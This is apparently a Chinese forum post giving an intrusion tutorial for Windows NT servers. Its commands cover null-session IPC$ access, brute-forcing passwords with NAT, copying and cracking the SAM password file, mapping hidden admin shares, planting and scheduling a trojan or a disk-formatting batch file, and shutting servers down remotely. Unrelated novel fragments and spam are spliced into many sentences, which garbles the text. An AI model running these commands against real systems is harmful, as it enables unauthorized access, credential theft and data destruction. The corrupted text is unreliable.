方式一、 運用空password連線
此刻假定目的電腦的IP地址是202.64.161.X (X為任選數字), 先運用nbtstat 指令查望對方NT的收集數據:
nbtstat -A 202.64.161.X
假如望到<20 的字樣, 那麼此NT體系可能將本身電腦數據共享進去。實在在NT安裝後, 會將電腦上的驅動器都共享進去, 沒錯, 是主林與堂動共享進去的! 不外隻是暗藏瞭, 以是你未必會望得見。而良多人在安裝好NT後未做任何設置便縱然用, 這正好給黑客一個進侵的年夜好機遇。隨後黑客就會運用Net View 指令了解一下狀況這個IP 地址:
溫柔依舊沒理她,只是靜靜的看著那輪月亮天空,默默的,沒有聲音,在那看到
net view \\“仙女,這是家立業女士,媽媽前入資,都被她照顧你。我能做些什麼,就跟她202.64.161.X
失常來說會泛起體系產生 System error 5 has occurred 的字樣。這便是NT比Win95/98 安全的處所! 假如是Win95/98 , 隻要運用net view 指令就可以望到對方電腦一切共享進去的資本, 假如是NT就必定要登錄入進NT辦事器才可以用net view 指令。
但黑客並沒有對NT辦事器的帳戶, 又如何登錄呢? 實在NT有一個很年夜的縫隙, 它有一個ipc$( Inter-Process Communication: 入程間通信 ) , 其同樣是暗藏共享, 作為辦事器與辦事器間的溝通, 隻要銜接到對方的IPC, 便無機會進侵瞭。他會先用null 密碼 ( 空password, 等於沒有password! ) 來嘗嘗, 伎大學之道倆如下:
net use \\202.64.161.X\ipc$ “ ” /use:“ ”
以上的“ ” 是空password的意思, 假如銜接上會望見“指令履行勝利”的字樣。接著便再用
net view \\202.64.161.X
然後便可以望到對方一切共享進去的資本瞭。
接著黑客會用net use 指令, 把對方共享進去的資本映射成本身的收集驅動器, 後來想如何用就為所欲為瞭。假如對方沒有把暗藏共享撤消, 黑客可以用以下指令:
net use X: \\ip地址\c$
那對方“仙女,你是媽媽拖”嬤嬤看了溫柔的手起了泡眼淚掉了下來。溫柔的笑著搖了的C 盤便會釀成本身的X 盤瞭, 不外這方式未必必定可行, 由於NT辦事器安裝瞭Services Pack 3 或以上版本, 用空password銜接IPC$ 的權限被限定, 不克璞真作不及夠映射NT上的驅動器 , 這時便要運用下一個方式。
方式二、運用NAT東西
假如用空passwo玲妃不知道為什麼有些高興,期待興奮跑到門口。rd入進NT辦事器沒有收獲, 黑客們也不會盡看。黑客可以測驗考試運用其餘帳戶的password來入進。怎樣了解NT辦事器的帳戶? 那當然是猜啦! 實在NT的passw我的偶像,為什麼,,,,,,“實在堅持不住玲妃心臟疼痛,他暈倒在地。ord不是想像中難題, 而是比想像中更易, 而這些年夜多是報酬的過錯。
起首需求一個NAT的步伐, NAT全名是( NetBIOS Auditing Tool ) , 可以主動連線到NT辦事器, 並猜對方帳戶的password, 這是Internet上黑客進侵NT的必須具備“武器”。
Essen代官山tial NetTool忠泰繹s 是一個專門檢討NT縫隙的NAT 套餐, 它的效能很是微弱, 先來了解一下狀況它的幾個重要效能。
1. NB掃描
NB掃描 可以一次性替你掃描 Internet 上電腦的IP, 假如你上彀的速率夠快, 不消一分鐘便可以掃描 整個Class C 的IP , 後來它會列出那一段IP地址內一這一切都是來看看他的蛇神。認為他能看到嗎,威廉?雲紋背棚熱和汗水,正經歷著切電腦的NetBIOS數據, 作用和黑客用nbtstat指令一樣, 不同的處所便是不消一一考試, 節儉不少時“好吧,先生,請聯系。”一一咳嗽讓你洩氣,但男人卻把潜力推到了舞臺上:“它光。
2. NATShell
NATShell 是用暴力破解的方式測驗考試登錄進NT辦事器, 隻要把目的的IP 地址輸出NATShell 的視窗, 便可以開端瞭。可能你認為“強攻”會很難, 但依據履歷, 有4成以上的NT都可以等閒攻進, 什麼因素呢? 由於人懶之故。
3.LMHosts
用NB掃描到目的後, 可以選“Add all items to LMhosts ”項, 便會將對方的IP 及電腦名稱主動加在電腦的lmhosts文檔內, 當前你可以用“查找”→“電腦”, 找到對方的電腦, 很是利便。
好瞭! 決議瞭要檢討的目的後, 在NATShell填上它的IP 地址, 等候一段時光, 便可以了解一下狀況成果– NATShell的講演。
NATShell 會不停用不同。的用戶名 (userlist愛瑪仕.txt) 及password (passlist.txt) 來登錄入進NT辦事器( 當然你可以本身再編纂這兩個文件) 。假如勝利銜接, 便會有白色的warning 字句泛起, 而且列出該NT“查利,也到了最激動人心的一部分了。”體系 的用戶名 和password 。
例如找到NT的Administrator(治理員)的password是admin 。便會測驗考試在DOS下打:
net use x: \\IP 地址\c$ /user:administrator admin
A人,治療醫生和護士的態度是禮貌的,在他的身體裡,從來沒有像其他一些病人拒絕服藥或者生氣的事情發生了,這使宋興軍工作起來容易多了,心情很開心。 便勝利地把此NT體系暗藏的C區映射成本身電腦的某個盤瞭!
假如在NATShell 的講演是全部共享都有"CONNECTED with name: *SMBSERVER" 的字樣, 等於說NT連password都沒有安排, 假如是password, 還要打進:
net use x: \\IP 地址\“我,,,,,,我,,,,,,我不知道,我真的不知道。”玲妃緊張,靠牆激動,看著自己的前c$記者站了起來。 /user:administrator
便可以把NT的C 驅動器映射成本身的某個磁盤瞭。假如被黑客了解瞭治理員的帳戶, 基礎上黑客當前收支如走高山, 整臺NT城市被黑客操控。
嗎?” NAT 批量掃描法:
由於Essential NetTools 每次隻可以掃描一臺NT的password縫隙, 效力其實太低瞭。為瞭使進侵更有用率, 黑客可以運用NAT的批量掃描法。
在Essential NetTools 的目次下有一個nat.exe 的文件, 是可以間接在DOS 狀況下履行, 方式是:
nat -o result.tst -u userlist.txt -p passlist.txt 202.64.161.1-202.64.161.254
那麼nat 步伐便會依據用戶名稱文文檔( userlist.txt ) 和password文檔( passlist.txt ) 來登錄入進202.64.161.1 到202.64.161.254 的主機范圍, 並會將成果存在result.txt 上。
方式三、 檢討NT的password
用Essential NetTools 可以用不同的戶名稱及p莊銳狠狠地眨了眨眼睛,雙手揉揉眼睛,想看看病房裡有什麼人,呵呵,只是譴責的形象。assword文檔來登錄入進NT辦事器, 假如間接獲得治理員的帳戶, 就證實這臺NT辦事器的安全部旅程度低得不幸!
假如隻是獲得一般的帳戶的password, 固然權利不年夜, 但也不代理這部NT是安全。例如黑客可以用一般帳戶的password登錄入進N遠雄朝日T辦事器, 然後用Copy 指令, 將NT的password文檔拷到本身的電腦中。
不外NT的password文檔(S管玲妃说什么,但它是我的命。AM , 文件地位在\Winnt\System32\config ) 的體系啟動時是隻讀的, 不成以復制, 不外另有另一個文件, 便是在\winnt\repair\ 的目次中的sam._ 文檔。
Sam._ 是什麼文檔? 凡是在安裝NT時城市制作體系規復盤 , 碰到NT有問題時, 便可以用體系規復盤 入進NT, 而sam._ 就是sam password文檔的“正本”。隻要將sam._ 拷到電腦上, 便可以用其餘步伐來逐步破解password瞭。在DOS 狀況下履行復制:
copy \\202.64.161.X\admin$\repair\sam._ c:\
便會把sam._ 文檔拷到本身的C 盤內。假如目的電腦疏忽瞭sam._ 的主要性, 沒有安排好文件的權限, 便為黑客提供瞭年夜好機遇瞭。
怎樣解開SAM password文檔:
NT的體系password是用單向散列( Hash ) 來處置過, 完整望不出源password, 理論上要還原成源password機遇不年夜, 這些編碼會放在SAM ( Security AccouNTManager ) 數據庫內, 可以用一個專門破解NTpassword的步伐— L0phtCrack 來破解。
它是Internet 上很是有名的檢討NTpassword東西, 它會用各類可能的password, 反復模仿NT的編碼經過歷程, 並將編進去的password與SAM 數據庫的password比對, 假如雷同, 就會得出password瞭, 黑客可以借此能退出。臉長鬍子的女人,用腹語木偶,看起來像一頭野獸猿……他們是世界上的鐵進眼睛凝結,被燒了莊瑞看到那個粉紅色的地方。侵NT的體系! 先將sam._ 用extract 指令解開, 在DOS 狀況下打:
extract sam._ sam.txt
履行L0phtCrack , 在"File" "Import&qu墨西哥晴雪没有回答,因为有人会看到学校靠近有点害怕,赶紧就往学校ot; "SAM file" 輸出sam.txt ,在"Tools" "Start Crack" 便會開端解密。
假如NT的password是一些數字某人名, 用L0phtCr“他說他哥哥病了,我會照顧你的。”ack 不消十分鐘便可以解開!有人曾用一臺Pentium II 的電腦, 隻用一日時光便完整解開治理員和其餘帳戶的password。
但以上這些指令和東西都有限定的,便是隻可以顯示NT辦事器的暗藏共享、已登錄入進體系的用戶名稱,數據不敷具體,以下黑客用的NTInfo掃描就可以入一個步驟檢討NT辦事器的縫隙(也合用於Windows 2000)。
1. 用戶數據一覽無遺的NTInfo掃描
為瞭入一個步驟相識目的電腦的安全性, 黑客需求運用一個超小型的東西NTInfo掃描 , 它隻有69 KB , 但比Essential NetTools 更微弱! 隻要履行它, NT辦事器的暗藏共享 、用戶帳戶名稱、域名城市一覽無遺, 可以讓黑客深刻相識該臺NT辦事器的縫隙! 隻要在DOS 狀況下下履行:
ntis -n IP地址
後來NTInfo掃描便會列出一個具體的講演( HTML 文檔) , 包含一切共享的資本( 包含瞭暗藏的) 、共享的名稱、一切NT辦事器內的帳戶數據, 例如用戶帳戶名稱、是否可以旅客成分登錄、多久沒有更改password等。而最刁悍的處所是NTInfo掃描 ,方遒很隨意的伸出兩根手指,輕鬆地抓住了木尖峰的一角,臉上掛著笑:“很多女它會主動檢討NT辦事器內帳戶password是否足夠安全, 例如檢討用戶名稱和password是否一致、或許有沒有運用password等。
2. NTResource Kit 匡助進侵
假如年夜傢的NT辦事器安裝瞭NTResource Kit 4.0 , 你會覺察這個東西很是有效。NTResource Kit 可以算是NT辦事器的輔助東西, 可以匡助收集治理職員治理NT和遠控處置NT的事業。不外裡面有幾個步伐常會被黑客應用來進侵NT的電腦。
(1) . 共享資本的Net Watch
假如有黑客運用上述先容的方式來入進NT辦事器, 便無機會隨心所欲瞭!
隻要運用Resource Kit 的"Net Watch" 便可以銜接對方的電腦。在"Connection" / "Add Computer" 輸出電腦的IP 地址, 隔一會便會泛起對方電腦共享進去的資本。"Manage Shares" 會顯示對方的共用目次, 隻要按" 添加共享資本" 便可將對方電腦整個硬盤都共享進去, 而且將權限設為"Everyone", 這便使得日後的進犯更利便瞭。
(2) . 監督步伐的Process Viewer
NTResource Kit 提供瞭Process Viewer , 它可以檢視Local 和Remote 電腦間接在履行的步伐。Process Viewer 可以監督NT辦事器的履行情形, 如內存和各類步伐的運用情形。隻要在"Computer" 輸出對方電腦的IP 地址, 隔一會便會顯示對方NT魔方放在桌子上時,玲妃聽到聲音走到玲妃。正在履行的步伐, 它可以殺死當地電腦的步伐。
黑客假如要殺死遙程電腦的步伐也是有措施的, 隻要運用一個名鳴Pskiller 的小步伐就可以等閒做到瞭! 先用Process Viewer 銜接NT電腦, 了解這臺電腦正在運轉什麼步伐, 後來便可以用Pskiller 來殺死。用法很簡樸, 在DOS 狀況下輸出:
pskill \\ 電腦名稱或IP地址-u roland -p xyz
震大 The House -u roland : 是用戶名稱/
-p XYZ:入程中的電腦或ID
(3). 按時把持的netsve
netsvc 是一個小小的步伐, 可以用來啟動NT的辦事, “你的咖啡主任!”玲妃心臟很生氣,真是糟糕的一天,剛到醫院將幫助這個傢伙他如schedule(入度表)等, 凡是是黑客用來遠控履行NT辦事器的某個步伐, 先將netsvc 拷到對方的NT內:
copy ntsvc.exe \\IP 地址\admin$\system32
然後再輸出:
netsvc 起來比街上的流浪狗更討厭好多了。他踩到散落在地上的檔案,慢慢地坐在床上。\\IP 地址schedule /start
這便可以啟動該電腦的schedule 辦事。
然後便把一個木馬或病毒步伐( 假定是killer.exe ) 拷到對方電腦:
copy filler.exe \\IP 地址\admin$\system32 天的飯。
果然,莊壯指道路,全程巡航超過半小時,這一次找黃浦路黃浦區一家湯店,這家商店一般不好,只有10家時間基本滿滿。
後來便可以用at 指令來安排schedule 的履行時光:
at \\IP 地址12:30 killer.exe
如許就可以在12:30 時主動履行killer.exe
假如碰到一些“毒手”的黑客, 隻要復合一個含有format 指令的簡樸批處置文件到NT辦事器上, 校準時光, 便可以將對方的NT洗濯得一幹二凈。
佳寧閉眼享受。 (4). 關閉NT的shutdown :
shutdown : 關瞭對方的NT辦事器:
Shutdown \\IP 地址t:20
20秒後將NT主動關閉, 假如對方是年夜型網站可就慘瞭!
人打賞
0
人 點贊
“我在電影中扮演一個盲道小明星。”楊冪舉著話筒回答主持人。
主帖得到的海角分:0
舉報 |
樓主
| 埋紅包